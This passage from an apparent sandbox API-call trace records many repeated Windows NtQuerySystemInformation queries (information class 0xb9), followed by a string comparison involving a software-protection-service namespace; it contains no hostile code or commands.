(SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0227.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0227.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0227.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0227.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0227.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fccb0, Length=0x28, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd30, Length=0x28, ResultLength=0x0) [0227.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd30, Length=0x28, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcbd0, Length=0x20, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc90, Length=0x20, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc20, Length=0x20, ResultLength=0x0) [0227.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc20, Length=0x20, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x28, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x28, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.414] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 